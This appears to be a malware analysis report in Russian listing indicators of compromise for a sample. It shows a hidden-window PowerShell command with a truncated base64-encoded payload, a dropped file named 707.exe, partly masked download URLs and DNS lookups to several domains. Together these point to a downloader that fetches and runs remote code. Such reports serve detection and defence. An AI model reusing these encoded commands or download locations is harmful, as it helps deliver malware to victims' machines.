Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAGcAYQBhAGgAegBqAG8AcAA9ACcAWQBjAHUAdwBvAGsAaAB1AGkAdwB3AGQAJwA7ACQAQgB5AHEAZAB1AGwAeABzAHUAIAA9AC...
- %HOMEPATH%\707.exe
- %HOMEPATH%\707.exe
- http://re####reelancer.com/online/x0t94q/
- http://www.ri###eiki.com/bk-5-9-2019/jRE/
- http://ja###taziz.org/jannat/epm3/
- DNS ASK me####inambung.com
- DNS ASK re####reelancer.com
- DNS ASK ri###eiki.com
- DNS ASK ja###taziz.org
- DNS ASK mi###cee.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAGcAYQBhAGgAegBqAG8AcAA9ACcAWQBjAHUAdwBvAGsAaAB1AGkAdwB3AGQAJwA7ACQAQgB5AHEAZAB1AGwAeABzAHUAIAA9AC...' (со скрытым окном)